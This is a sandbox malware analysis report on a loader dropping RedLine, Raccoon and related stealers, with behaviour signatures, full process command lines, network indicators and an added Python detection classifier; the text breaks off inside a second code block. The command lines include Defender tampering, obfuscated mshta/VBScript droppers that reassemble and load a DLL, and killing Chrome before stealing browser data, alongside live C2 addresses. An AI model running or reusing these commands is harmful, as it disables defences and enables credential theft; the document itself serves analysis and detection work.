Malware Analysis Report

2024-11-13 19:46

Sample ID 220806-wsk1dsbhe2
Target 40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe
SHA256 40c4d06433a2db2e570b3302e01c5c2ebe51efb59473a5b08cb132ab6af8638b
Tags privateloader raccoon redline 2f2ad1a1aa093c5a9d17040c8efd5650a99640b5 fucker2 media18 aspackv2 infostealer loader stealer onlylogger socelars chris discovery spyware
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V6
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score 10/10
SHA256 40c4d06433a2db2e570b3302e01c5c2ebe51efb59473a5b08cb132ab6af8638b
Threat Level: Known bad

The file 40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe was found to be: Known bad.

Malicious Activity Summary

Socelars payload

Process spawned unexpected child process

Socelars

OnlyLogger

PrivateLoader

RedLine

Raccoon

RedLine payload

OnlyLogger payload

Blocklisted process makes network request

Executes dropped EXE

ASPack v2.12-2.42

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Kills process with taskkill

Script User-Agent

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Modifies system certificate store

Suspicious use of UnmapMainImage

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-06 18:11

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-06 18:11

Reported

2022-08-06 18:13

Platform

win7-20220718-en

Max time kernel

37s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe"

Signatures

PrivateLoader

loader privateloader

Raccoon

stealer raccoon

RedLine

infostealer redline

RedLine payload

11 hits; no description, indicator, process or target was rendered for this rule.

ASPack v2.12-2.42

aspackv2
6 hits; no description, indicator, process or target was rendered for this rule.

Executes dropped EXE

Process (19 events, in order; description, indicator and target not rendered):
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19c43a743a35.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1922ecc1aaabd2.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b6650547.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19ad8dd95e905.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b1a112f2.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19862f0a4c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19581adec51f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1984208f692605cf.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue199b79a9228e.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19de85da9de6.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19896d3ece3b4.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue199b79a9228e.exe
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19896d3ece3b4.exe
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe

Note: ~Xy1GPomKV09sC.Exe is a copy of Tue196c8dc8316d5e.exe made with `type ... >` by the mshta/cmd one-liner shown in the Processes section. Tue199b79a9228e.exe, Tue19896d3ece3b4.exe and Tue19053251dd9e13fe.exe each appear twice because each image is launched a second time by itself (see the Processes section); taken together with the SetThreadContext, MapViewOfSection and UnmapMainImage hits in the overview, that is the shape of a process re-launching its own image and replacing the child's mapped image.

Loads dropped DLL

Process (56 events, in order, with event count; description, indicator and target not rendered):
C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe (3)
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe (8)
C:\Windows\SysWOW64\cmd.exe (7)
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe (2)
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe (2)
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1922ecc1aaabd2.exe (2)
C:\Windows\SysWOW64\cmd.exe (7)
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19ad8dd95e905.exe (2)
C:\Windows\SysWOW64\cmd.exe (2)
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19862f0a4c.exe (2)
C:\Windows\SysWOW64\cmd.exe (2)
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1984208f692605cf.exe (2)
C:\Windows\SysWOW64\cmd.exe (1)
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19896d3ece3b4.exe (2)
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe (2)
C:\Windows\SysWOW64\WerFault.exe (3)
C:\Windows\SysWOW64\cmd.exe (1)
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe (2)
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe (1)
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19896d3ece3b4.exe (1)
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe (2)

The dropped DLLs themselves are listed with hashes in the Files section (libwinpthread-1.dll, libcurlpp.dll, libcurl.dll, all unpacked into the 7zSC735351C directory next to setup_install.exe).

Legitimate hosting services abused for malware hosting/C2

Looks up geolocation information via web service

Enumerates physical storage devices

Kills process with taskkill

evasion
C:\Windows\SysWOW64\taskkill.exe (2 events; description, indicator and target not rendered). The two command lines appear in the Processes section: `taskkill -iM "Tue196c8dc8316d5e.exe" /f`, which removes the original dropper after it has been copied to ~Xy1GPomKV09sC.Exe and restarted, and `taskkill /f /im chrome.exe`, which closes the browser so its profile databases are not locked when the stealer reads them.

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (binary value not rendered in this export) C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A

Caveat: CABD2A79A1076A31F21D253635CB039D4329A5E8 is the SHA-1 thumbprint of ISRG Root X1, the Let's Encrypt root, so this is a public CA root being added to the machine ROOT store, not a private interception root. On a Windows 7 image without current root updates, chains issued by Let's Encrypt stopped validating after DST Root CA X3 expired on 30 September 2021, and the most likely reason for a dropped EXE to install this root is to make its own HTTPS connections succeed; the fetch from apps.identrust.com in the Network section (the IdenTrust AIA/CRL host referenced by that chain) fits the same picture. Decode the Blob value and confirm the subject before reporting a rogue root CA, but keep the event as a detection: a user-mode program writing HKLM\...\SystemCertificates\ROOT is not normal application behaviour.

Suspicious behavior: EnumeratesProcesses

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (2 events; description, indicator and target not rendered)

Suspicious use of AdjustPrivilegeToken

Process: privileges enabled (indicator and target not rendered)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe: SeDebugPrivilege (2 events)
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe: SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 31, 32, 33, 34, 35
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19de85da9de6.exe: SeDebugPrivilege
C:\Windows\SysWOW64\taskkill.exe: SeDebugPrivilege
C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19862f0a4c.exe: SeDebugPrivilege

Note: the list for Tue19b2a645b19f70.exe is the privilege LUIDs 2 through 35 in numeric order (the sandbox did not resolve 31-35 to names); the process asks AdjustTokenPrivileges for every privilege Windows defines rather than the ones it needs. AdjustTokenPrivileges reports success with ERROR_NOT_ALL_ASSIGNED for privileges the token does not hold, so this shows a blanket attempt, not that the process actually gained those rights. SeDebugPrivilege on taskkill.exe is expected: taskkill enables it to force-terminate processes it does not own.

Suspicious use of WriteProcessMemory

Parent PID -> child PID (number of writes): parent image -> child image
892 -> 1260 (7): C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe -> C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe
1260 -> 820 (7): C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe -> C:\Windows\SysWOW64\cmd.exe
1260 -> 1288 (7): C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe -> C:\Windows\SysWOW64\cmd.exe
820 -> 1924 (7): C:\Windows\SysWOW64\cmd.exe -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
1288 -> 1920 (7): C:\Windows\SysWOW64\cmd.exe -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
1260 -> 392 (7): C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe -> C:\Windows\SysWOW64\cmd.exe
1260 -> 1508 (7): C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe -> C:\Windows\SysWOW64\cmd.exe
1260 -> 884 (7): C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe -> C:\Windows\SysWOW64\cmd.exe
1260 -> 268 (7): C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe -> C:\Windows\SysWOW64\cmd.exe
1508 -> 1532 (1): C:\Windows\SysWOW64\cmd.exe -> C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19c43a743a35.exe

Note: every row is a parent writing into a child it has just created. A parent does that during ordinary CreateProcess, when it populates the new process's parameter block, so these rows are best read as the process tree (sample 892 -> setup_install.exe 1260 -> six cmd.exe children 820/1288/392/1508/884/268 -> the two powershell.exe instances 1924/1920 and the dropped EXEs) rather than as proof of code injection. The injection-type evidence in this report is the separate SetThreadContext, MapViewOfSection and UnmapMainImage hits listed in the overview.

Processes

C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe

"C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b6650547.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19053251dd9e13fe.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c43a743a35.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1922ecc1aaabd2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b6650547.exe

Tue19b6650547.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue196c8dc8316d5e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19c43a743a35.exe

Tue19c43a743a35.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe

Tue19053251dd9e13fe.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1967b2731eea4d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe

Tue196c8dc8316d5e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19862f0a4c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b1a112f2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1922ecc1aaabd2.exe

Tue1922ecc1aaabd2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19ad8dd95e905.exe

Tue19ad8dd95e905.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1984208f692605cf.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b1a112f2.exe

Tue19b1a112f2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19581adec51f.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19ad8dd95e905.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue199b79a9228e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19de85da9de6.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19862f0a4c.exe

Tue19862f0a4c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue199b79a9228e.exe

Tue199b79a9228e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19de85da9de6.exe

Tue19de85da9de6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b2a645b19f70.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1984208f692605cf.exe

Tue1984208f692605cf.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19896d3ece3b4.exe

Tue19896d3ece3b4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19896d3ece3b4.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19581adec51f.exe

Tue19581adec51f.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe

Tue19b2a645b19f70.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue199b79a9228e.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue199b79a9228e.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 492

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe") do taskkill -iM "%~nXx" /f

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue196c8dc8316d5e.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19896d3ece3b4.exe

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19896d3ece3b4.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe
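The command lines above carry the techniques a detection engineer would key on from this run: Defender tampering with `Set-MpPreference -DisableRealtimeMonitoring $true` and an `Add-MpPreference -ExclusionPath` covering the drop directory; mshta.exe executing a mixed-case `vbscript:` one-liner whose only job is to pass a cmd.exe command to WScript.Shell.Run (VBScript writes a quote inside a string literal as `""`, which is why the inner command shows doubled quotes), used once to copy the dropper to a random name, start it and taskkill the original, and once to rebuild a DLL by writing an `MZ` stub with `set /p` (which prints its prompt without a trailing newline) and binary-concatenating the headerless chunks with `copy /b`, then loading it via `msiexec -Y` (msiexec's /y switch calls DllRegisterServer in the named file, the same effect as regsvr32); and `taskkill /f /im chrome.exe` before the browser's profile data is read. The Python below is an added example written for this page, not sandbox or malware code: it unwraps the mshta wrapper, folds case and whitespace, tags each line, and pulls the chunk list out of the `copy /b` command. The sample lines are copied from the process list above except the labelled benign control; the tag names, the browser list and the treatment of `-y` as equivalent to `/y` are the example's own assumptions.

```python
import re
from typing import Optional

# Command lines copied from the Processes section of this report.
SAMPLES = {
    "defender_off": r'''powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true''',
    "defender_excl": r'''powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"''',
    "mshta_selfcopy": r'''"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )''',
    "mshta_reassemble": r'''"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )''',
    "browser_kill": r'''cmd.exe /c taskkill /f /im chrome.exe''',
    # Constructed benign control line, not taken from the report.
    "benign": r'''"C:\Windows\system32\cmd.exe" /c dir "C:\Users\Admin"''',
}

MSHTA_RUN = re.compile(r'\.\s*run\s*\(\s*"', re.IGNORECASE)
COPY_B = re.compile(r'copy\s+/b(?:\s+/y)?\s+(.*?)\s+(\S+)\s*(?:&|$)', re.IGNORECASE)
# Assumed browser image names; the report itself only shows chrome.exe.
BROWSERS = r'(chrome|firefox|msedge|opera|brave)\.exe'


def unwrap_mshta(cmdline: str) -> Optional[str]:
    """Return the command handed to WScript.Shell.Run by an `mshta vbscript:`
    one-liner, or None if the line is not such a wrapper. VBScript escapes a
    quote inside a string literal as "", so "" is folded to a single quote and
    the first lone quote terminates the literal."""
    low = cmdline.lower()
    if "mshta" not in low or "vbscript:" not in low:
        return None
    m = MSHTA_RUN.search(cmdline)
    if not m:
        return None
    out, i = [], m.end()
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            if cmdline[i + 1:i + 2] == '"':
                out.append('"')
                i += 2
                continue
            break
        out.append(ch)
        i += 1
    return "".join(out).strip()


def copy_b_parts(cmd: str):
    """(chunk list, output name) of a `copy /b a + b + c out` reassembly, or None."""
    m = COPY_B.search(cmd)
    if not m:
        return None
    return [p.strip() for p in m.group(1).split("+")], m.group(2)


def classify(cmdline: str) -> dict:
    """Tag one process command line with the behaviours seen in this report."""
    inner = unwrap_mshta(cmdline)
    cmd = inner if inner is not None else cmdline
    low = " ".join(cmd.split()).lower()          # fold case and whitespace
    tags = set()
    if inner is not None:
        tags.add("mshta_vbscript_wrapper")
    if "set-mppreference" in low and "-disablerealtimemonitoring $true" in low:
        tags.add("defender_realtime_disabled")
    if "add-mppreference" in low and "-exclusionpath" in low:
        tags.add("defender_exclusion_added")
    # type <self> > <random>.exe && start <random>.exe ... taskkill <self>
    if re.search(r'\btype\s+"[^"]+"\s*>\s*\S+', low) and "start " in low and "taskkill" in low:
        tags.add("self_copy_then_kill_parent")
    # echo | set /p = "MZ" > stub & copy /b stub + chunks out
    if re.search(r'set\s*/p\s*=\s*"?mz"?\s*>', low) and copy_b_parts(low):
        tags.add("mz_header_prepend_reassembly")
    if re.search(r'\bmsiexec\b.*\s[-/]y\s', low):   # msiexec /y == DllRegisterServer
        tags.add("msiexec_dllregisterserver_load")
    if re.search(r'taskkill\b.*[-/]im\s+"?' + BROWSERS, low):
        tags.add("browser_killed")
    return {"inner": inner, "tags": tags, "reassembly": copy_b_parts(cmd)}


if __name__ == "__main__":
    for name, line in SAMPLES.items():
        r = classify(line)
        print(f"{name:17s} {sorted(r['tags'])}")
        if r["reassembly"]:
            print(f"{'':17s} chunks={r['reassembly'][0]} -> {r['reassembly'][1]}")
```

The unwrapping step matters more than the tags: a rule that matches on `cmd.exe` arguments never sees these commands, because the strings that reach cmd.exe here (the lines starting `"C:\Windows\system32\cmd.exe" /q /C tYPe` and `/R ECHO | seT /P`) are only visible once mshta has evaluated the VBScript, and case-folding is needed because every keyword is randomly capitalised.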

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 mooorni.xyz udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 telegatt.top udp
AU 103.224.212.220:443 www.listincode.com tcp
N/A 127.0.0.1:49298 tcp
N/A 127.0.0.1:49300 tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 104.110.191.182:80 apps.identrust.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 104.20.68.143:443 pastebin.com tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 172.67.221.103:443 niemannbest.me tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 telegka.top udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 www.iyiqian.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
FR 91.121.67.60:2151 tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 telegin.top udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
FR 91.121.67.60:2151 tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
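The Network table mixes DNS lookups, TLS fetches from services that are legitimate in themselves (Discord's CDN, pastebin, iplogger), repeated fetches from one Cloudflare-fronted host, connections to bare IPs with no name behind them, and a single connection on a non-web port. For IOC extraction those need to be separated: a name that was resolved but never connected to is still worth blocking, and a bare IP on port 2151 is the kind of endpoint that belongs on a firewall list. The Python below is an added example for this page, not sandbox code. It parses rows in the table's own four-column layout (a subset of the rows above is embedded) and reports resolved-only names, direct-IP destinations, non-80/443 ports, and which legitimate hosting services were contacted. The `LEGIT_HOSTING` set is the example's assumption about which services the report's "Legitimate hosting services abused" signature fired on.

```python
import re
from collections import defaultdict

# Rows copied from the Network table above (Country Destination Domain Proto);
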